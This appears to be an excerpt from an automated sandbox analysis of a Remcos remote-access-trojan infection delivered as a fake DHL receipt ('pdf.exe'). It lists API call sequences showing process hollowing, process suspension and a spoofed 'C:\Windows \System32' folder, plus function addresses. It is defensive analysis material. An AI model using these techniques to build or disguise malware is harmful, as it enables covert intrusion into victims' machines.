              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_028B7CC8 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,0_2_028B7CC8
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_028B81B6 CreateProcessAsUserW,GetThreadContext,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,Wow64SetThreadContext,NtResumeThread,0_2_028B81B6
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_028BC6AC RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,0_2_028BC6AC
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_028BC7B2 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,0_2_028BC7B2
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_028B7A92 GetModuleHandleA,GetProcAddress,NtWriteVirtualMemory,0_2_028B7A92
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_028B7942 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory,0_2_028B7942
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_2DA5BB35 OpenProcess,NtResumeProcess,CloseHandle,0_2_2DA5BB35
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_2DA5BB09 OpenProcess,NtSuspendProcess,CloseHandle,0_2_2DA5BB09
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_2DA532D2 OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,0_2_2DA532D2
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 5_2_028F7A94 NtWriteVirtualMemory,5_2_028F7A94
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 5_2_028FDA24 NtQueryInformationProcess,5_2_028FDA24
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 5_2_028FC898 NtOpenFile,NtReadFile,5_2_028FC898
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 5_2_028FD9A4 NtQueryInformationProcess,5_2_028FD9A4
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 5_2_028F7944 NtAllocateVirtualMemory,5_2_028F7944
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 5_2_028F7A92 NtWriteVirtualMemory,5_2_028F7A92
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 5_2_028F7942 NtAllocateVirtualMemory,5_2_028F7942
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 5_2_2D5BD58F NtdllDefWindowProc_A,GetCursorPos,SetForegroundWindow,TrackPopupMenu,IsWindowVisible,ShowWindow,ShowWindow,SetForegroundWindow,Shell_NotifyIcon,ExitProcess,CreatePopupMenu,AppendMenuA,5_2_2D5BD58F
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 5_2_2D5B80EF CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,5_2_2D5B80EF
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 5_2_2D5BBB09 OpenProcess,NtSuspendProcess,CloseHandle,5_2_2D5BBB09
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 5_2_2D5BBB35 OpenProcess,NtResumeProcess,CloseHandle,5_2_2D5BBB35
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 5_2_2D5B32D2 OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,5_2_2D5B32D2
              Source: C:\Users\Public\alpha.exeCode function: 7_2_00007FF7689C89E4 NtQueryInformationToken,NtQueryInformationToken,7_2_00007FF7689C89E4
              Source: C:\Users\Public\alpha.exeCode function: 7_2_00007FF7689E1538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,7_2_00007FF7689E1538
              Source: C:\Users\Public\alpha.exeCode function: 7_2_00007FF7689B3D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,7_2_00007FF7689B3D94
              Source: C:\Users\Public\alpha.exeCode function: 7_2_00007FF7689C898C NtQueryInformationToken,7_2_00007FF7689C898C
              Source: C:\Users\Public\alpha.exeCode function: 7_2_00007FF7689C7FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,7_2_00007FF7689C7FF8
              Source: C:\Users\Public\alpha.exeCode function: 7_2_00007FF7689C88C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,7_2_00007FF7689C88C0
              Source: C:\Users\Public\alpha.exeCode function: 7_2_00007FF7689C8114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,7_2_00007FF7689C8114
              Source: C:\Users\Public\alpha.exeCode function: 7_2_00007FF7689DBCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,7_2_00007FF7689DBCF0
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7689C89E4 NtQueryInformationToken,NtQueryInformationToken,8_2_00007FF7689C89E4
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7689E1538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,8_2_00007FF7689E1538
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7689B3D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,8_2_00007FF7689B3D94
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7689C898C NtQueryInformationToken,8_2_00007FF7689C898C
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7689C7FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,8_2_00007FF7689C7FF8
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7689C88C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,8_2_00007FF7689C88C0
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7689C8114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,8_2_00007FF7689C8114
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7689DBCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,8_2_00007FF7689DBCF0
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7689C89E4 NtQueryInformationToken,NtQueryInformationToken,11_2_00007FF7689C89E4
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7689E1538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,11_2_00007FF7689E1538
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7689B3D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,11_2_00007FF7689B3D94
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7689C898C NtQueryInformationToken,11_2_00007FF7689C898C
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7689C7FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,11_2_00007FF7689C7FF8
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7689C88C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,11_2_00007FF7689C88C0
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7689C8114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,11_2_00007FF7689C8114
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7689DBCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,11_2_00007FF7689DBCF0
              Source: C:\Users\Public\ger.exeCode function: 19_2_00007FF6DF319890 NtSetInformationKey,NtQueryKey,RegQueryInfoKeyW,lstrlenW,memset,RegEnumKeyExW,RegOpenKeyExW,RegCloseKey,19_2_00007FF6DF319890
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 20_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,20_2_0040DD85
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 20_2_00401806 NtdllDefWindowProc_W,20_2_00401806
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 20_2_004018C0 NtdllDefWindowProc_W,20_2_004018C0
              Source: C:\Users\Public\alpha.exeCode function: 7_2_00007FF7689B5240: memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPEAX@Z,memset,CreateFileW,DeviceIoControl,memmove,CloseHandle,??_V@YAXPEAX@Z,memset,FindClose,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,7_2_00007FF7689B5240
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_028B81B8 CreateProcessAsUserW,GetThreadContext,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,Wow64SetThreadContext,NtResumeThread,0_2_028B81B8
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_2DA567B4 ExitWindowsEx,LoadLibraryA,GetProcAddress,0_2_2DA567B4
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 5_2_2D5B67B9 ExitWindowsEx,LoadLibraryA,GetProcAddress,5_2_2D5B67B9
              Source: C:\Users\Public\alpha.exeFile created: C:\WindowsJump to behavior
              Source: C:\Users\Public\alpha.exeFile created: C:\Windows \System32Jump to behavior
              Source: C:\Windows\System32\extrac32.exeFile created: C:\Windows \System32\per.exe
              Source: C:\Users\Public\alpha.exeFile deleted: C:\Windows \System32
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_028A20C40_2_028A20C4
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_2DA77D330_2_2DA77D33
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_2DA76FEA0_2_2DA76FEA
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_2DA53FCA0_2_2DA53FCA
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_2DA7DE9D0_2_2DA7DE9D
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_2DA66E0E0_2_2DA66E0E
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_2DA75E5E0_2_2DA75E5E
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_2DA8D9C90_2_2DA8D9C9
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_2DA739460_2_2DA73946
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_2DA778FE0_2_2DA778FE
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_2DA67BAF0_2_2DA67BAF
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_2DA5DB620_2_2DA5DB62
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_2DA67A460_2_2DA67A46
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_2DA7E5580_2_2DA7E558
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_2DA774E60_2_2DA774E6
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_2DA787700_2_2DA78770
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_2DA861F00_2_2DA861F0
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_2DA781680_2_2DA78168
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_2DA941590_2_2DA94159
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_2DA5F0FA0_2_2DA5F0FA
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_2DA7E0CC0_2_2DA7E0CC
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_2DA6739D0_2_2DA6739D
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_2DA9332B0_2_2DA9332B
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_2DA7E2FB0_2_2DA7E2FB
              Source: C:\Users\Public\Libraries\yfkwifxL.pifCode function: 1_2_0040E8001_2_0040E800
              Source: C:\Users\Public\Libraries\yfkwifxL.pifCode function: 1_2_0040C8381_2_0040C838
              Source: C:\Users\Public\Libraries\yfkwifxL.pifCode function: 1_2_0040F1CA1_2_0040F1CA
              Source: C:\Users\Public\Libraries\yfkwifxL.pifCode function: 1_2_004112501_2_00411250
              Source: C:\Users\Public\Libraries\yfkwifxL.pifCode function: 1_2_004102D01_2_004102D0
              Source: C:\Users\Public\Libraries\yfkwifxL.pifCode function: 1_2_0040B2E71_2_0040B2E7
              Source: C:\Users\Public\Libraries\yfkwifxL.pifCode function: 1_2_004102F01_2_004102F0
              Source: C:\Users\Public\Libraries\yfkwifxL.pifCode function: 1_2_004105F01_2_004105F0
              Source: C:\Users\Public\Libraries\yfkwifxL.pifCode function: 1_2_004106731_2_00410673
              Source: C:\Users\Public\Libraries\yfkwifxL.pifCode function: 1_2_004106B91_2_004106B9
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 5_2_45BD71945_2_45BD7194
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 5_2_45BCB5C15_2_45BCB5C1
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 5_2_028E20C45_2_028E20C4
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 5_2_2D5BDB625_2_2D5BDB62
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 5_2_2D5DE5585_2_2D5DE558
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 5_2_2D5D74E65_2_2D5D74E6
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 5_2_2D5D6FEA5_2_2D5D6FEA
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 5_2_2D5D5E5E5_2_2D5D5E5E
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 5_2_2D5DDE9D5_2_2D5DDE9D
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 5_2_2D5D39465_2_2D5D3946
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 5_2_2D5E61F05_2_2D5E61F0
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 5_2_2D5DE0CC5_2_2D5DE0CC
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 5_2_2D5D78FE5_2_2D5D78FE
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 5_2_2D5F332B5_2_2D5F332B
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 5_2_2D5DE2FB5_2_2D5DE2FB
              Source: C:\Users\Public\alpha.exeCode function: 7_2_00007FF7689C55547_2_00007FF7689C5554
              Source: C:\Users\Public\alpha.exeCode function: 7_2_00007FF7689B7D307_2_00007FF7689B7D30
              Source: C:\Users\Public\alpha.exeCode function: 7_2_00007FF7689BAA547_2_00007FF7689BAA54
              Source: C:\Users\Public\alpha.exeCode function: 7_2_00007FF7689C37D87_2_00007FF7689C37D8
              Source: C:\Users\Public\alpha.exeCode function: 7_2_00007FF7689DD9D07_2_00007FF7689DD9D0
              Source: C:\Users\Public\alpha.exeCode function: 7_2_00007FF7689B81D47_2_00007FF7689B81D4
              Source: C:\Users\Public\alpha.exeCode function: 7_2_00007FF7689B8DF87_2_00007FF7689B8DF8
              Source: C:\Users\Public\alpha.exeCode function: 7_2_00007FF7689BCE107_2_00007FF7689BCE10
              Source: C:\Users\Public\alpha.exeCode function: 7_2_00007FF7689E15387_2_00007FF7689E1538
              Source: C:\Users\Public\alpha.exeCode function: 7_2_00007FF7689D7F007_2_00007FF7689D7F00
              Source: C:\Users\Public\alpha.exeCode function: 7_2_00007FF7689B6EE47_2_00007FF7689B6EE4
              Source: C:\Users\Public\alpha.exeCode function: 7_2_00007FF7689B52407_2_00007FF7689B5240
              Source: C:\Users\Public\alpha.exeCode function: 7_2_00007FF7689BD2507_2_00007FF7689BD250
              Source: C:\Users\Public\alpha.exeCode function: 7_2_00007FF7689B9E507_2_00007FF7689B9E50
              Source: C:\Users\Public\alpha.exeCode function: 7_2_00007FF7689B76507_2_00007FF7689B7650
              Source: C:\Users\Public\alpha.exeCode function: 7_2_00007FF7689B22207_2_00007FF7689B2220
              Source: C:\Users\Public\alpha.exeCode function: 7_2_00007FF7689C42247_2_00007FF7689C4224
              Source: C:\Users\Public\alpha.exeCode function: 7_2_00007FF7689B4A307_2_00007FF7689B4A30
              Source: C:\Users\Public\alpha.exeCode function: 7_2_00007FF7689DAA307_2_00007FF7689DAA30
              Source: C:\Users\Public\alpha.exeCode function: 7_2_00007FF7689BE6807_2_00007FF7689BE680
              Source: C:\Users\Public\alpha.exeCode function: 7_2_00007FF7689DEE887_2_00007FF7689DEE88
              Source: C:\Users\Public\alpha.exeCode function: 7_2_00007FF7689C0A6C7_2_00007FF7689C0A6C
              Source: C:\Users\Public\alpha.exeCode function: 7_2_00007FF7689DAFBC7_2_00007FF7689DAFBC
              Source: C:\Users\Public\alpha.exeCode function: 7_2_00007FF7689B34107_2_00007FF7689B3410
              Source: C:\Users\Public\alpha.exeCode function: 7_2_00007FF7689B6BE07_2_00007FF7689B6BE0
              Source: C:\Users\Public\alpha.exeCode function: 7_2_00007FF7689B9B507_2_00007FF7689B9B50
              Source: C:\Users\Public\alpha.exeCode function: 7_2_00007FF7689B372C7_2_00007FF7689B372C
              Source: C:\Users\Public\alpha.exeCode function: 7_2_00007FF7689B3F907_2_00007FF7689B3F90
              Source: C:\Users\Public\alpha.exeCode function: 7_2_00007FF7689B5B707_2_00007FF7689B5B70
              Source: C:\Users\Public\alpha.exeCode function: 7_2_00007FF7689C18D47_2_00007FF7689C18D4
              Source: C:\Users\Public\alpha.exeCode function: 7_2_00007FF7689B85107_2_00007FF7689B8510
              Source: C:\Users\Public\alpha.exeCode function: 7_2_00007FF7689BB0D87_2_00007FF7689BB0D8
              Source: C:\Users\Public\alpha.exeCode function: 7_2_00007FF7689C78547_2_00007FF7689C7854
              Source: C:\Users\Public\alpha.exeCode function: 7_2_00007FF7689DAC4C7_2_00007FF7689DAC4C
              Source: C:\Users\Public\alpha.exeCode function: 7_2_00007FF7689B2C487_2_00007FF7689B2C48
              Source: C:\Users\Public\alpha.exeCode function: 7_2_00007FF7689B18847_2_00007FF7689B1884
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7689C55548_2_00007FF7689C5554
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7689B7D308_2_00007FF7689B7D30
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7689BAA548_2_00007FF7689BAA54
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7689C37D88_2_00007FF7689C37D8
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7689DD9D08_2_00007FF7689DD9D0
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7689B81D48_2_00007FF7689B81D4
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7689B8DF88_2_00007FF7689B8DF8
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7689BCE108_2_00007FF7689BCE10
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7689E15388_2_00007FF7689E1538
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7689D7F008_2_00007FF7689D7F00
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7689B6EE48_2_00007FF7689B6EE4
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7689B52408_2_00007FF7689B5240
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7689BD2508_2_00007FF7689BD250
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7689B9E508_2_00007FF7689B9E50
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7689B76508_2_00007FF7689B7650
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7689B22208_2_00007FF7689B2220
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7689C42248_2_00007FF7689C4224
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7689B4A308_2_00007FF7689B4A30
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7689DAA308_2_00007FF7689DAA30
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7689BE6808_2_00007FF7689BE680
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7689DEE888_2_00007FF7689DEE88
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7689C0A6C8_2_00007FF7689C0A6C
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7689DAFBC8_2_00007FF7689DAFBC
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7689B34108_2_00007FF7689B3410
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7689B6BE08_2_00007FF7689B6BE0
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7689B9B508_2_00007FF7689B9B50
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7689B372C8_2_00007FF7689B372C
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7689B3F908_2_00007FF7689B3F90
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7689B5B708_2_00007FF7689B5B70
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7689C18D48_2_00007FF7689C18D4
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7689B85108_2_00007FF7689B8510
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7689BB0D88_2_00007FF7689BB0D8
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7689C78548_2_00007FF7689C7854
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7689DAC4C8_2_00007FF7689DAC4C
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7689B2C488_2_00007FF7689B2C48
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7689B18848_2_00007FF7689B1884
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7689C555411_2_00007FF7689C5554
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7689BAA5411_2_00007FF7689BAA54
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7689C422411_2_00007FF7689C4224
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7689C0A6C11_2_00007FF7689C0A6C
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7689C37D811_2_00007FF7689C37D8
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7689DD9D011_2_00007FF7689DD9D0
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7689B81D411_2_00007FF7689B81D4
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7689B8DF811_2_00007FF7689B8DF8
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7689BCE1011_2_00007FF7689BCE10
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7689E153811_2_00007FF7689E1538
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7689B7D3011_2_00007FF7689B7D30
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7689D7F0011_2_00007FF7689D7F00
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7689B6EE411_2_00007FF7689B6EE4
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7689B524011_2_00007FF7689B5240
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7689BD25011_2_00007FF7689BD250
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7689B9E5011_2_00007FF7689B9E50
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7689B765011_2_00007FF7689B7650
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7689B222011_2_00007FF7689B2220
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7689B4A3011_2_00007FF7689B4A30
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7689DAA3011_2_00007FF7689DAA30
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7689BE68011_2_00007FF7689BE680
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7689DEE8811_2_00007FF7689DEE88
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7689DAFBC11_2_00007FF7689DAFBC
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7689B341011_2_00007FF7689B3410
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7689B6BE011_2_00007FF7689B6BE0
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7689B9B5011_2_00007FF7689B9B50
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7689B372C11_2_00007FF7689B372C
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7689B3F9011_2_00007FF7689B3F90
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7689B5B7011_2_00007FF7689B5B70
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7689C18D411_2_00007FF7689C18D4
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7689B851011_2_00007FF7689B8510
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7689BB0D811_2_00007FF7689BB0D8
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7689C785411_2_00007FF7689C7854
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7689DAC4C11_2_00007FF7689DAC4C
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7689B2C4811_2_00007FF7689B2C48
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7689B188411_2_00007FF7689B1884
              Source: C:\Users\Public\xkn.exeCode function: 16_2_00007FFD9BAD10FA16_2_00007FFD9BAD10FA
              Source: C:\Users\Public\ger.exeCode function: 19_2_00007FF6DF31605419_2_00007FF6DF316054
              Source: C:\Users\Public\ger.exeCode function: 19_2_00007FF6DF31166419_2_00007FF6DF311664
              Source: C:\Users\Public\ger.exeCode function: 19_2_00007FF6DF31596C19_2_00007FF6DF31596C
              Source: C:\Users\Public\ger.exeCode function: 19_2_00007FF6DF317C7C19_2_00007FF6DF317C7C
              Source: C:\Users\Public\ger.exeCode function: 19_2_00007FF6DF31989019_2_00007FF6DF319890
              Source: C:\Users\Public\ger.exeCode function: 19_2_00007FF6DF3167A019_2_00007FF6DF3167A0
              Source: C:\Users\Public\ger.exeCode function: 19_2_00007FF6DF31405019_2_00007FF6DF314050
              Source: C:\Users\Public\ger.exeCode function: 19_2_00007FF6DF31767019_2_00007FF6DF317670
              Source: C:\Users\Public\ger.exeCode function: 19_2_00007FF6DF312D7019_2_00007FF6DF312D70
              Source: C:\Users\Public\ger.exeCode function: 19_2_00007FF6DF319C7419_2_00007FF6DF319C74
              Source: C:\Users\Public\ger.exeCode function: 19_2_00007FF6DF31431819_2_00007FF6DF314318
              Source: C:\Users\Public\ger.exeCode function: 19_2_00007FF6DF31512819_2_00007FF6DF315128
              Source: C:\Users\Public\ger.exeCode function: 19_2_00007FF6DF3172C019_2_00007FF6DF3172C0
              Source: C:\Users\Public\ger.exeCode function: 19_2_00007FF6DF316EC819_2_00007FF6DF316EC8
              Source: C:\Users\Public\ger.exeCode function: 19_2_00007FF6DF3183D819_2_00007FF6DF3183D8
              Source: C:\Users\Public\ger.exeCode function: 19_2_00007FF6DF316AE819_2_00007FF6DF316AE8
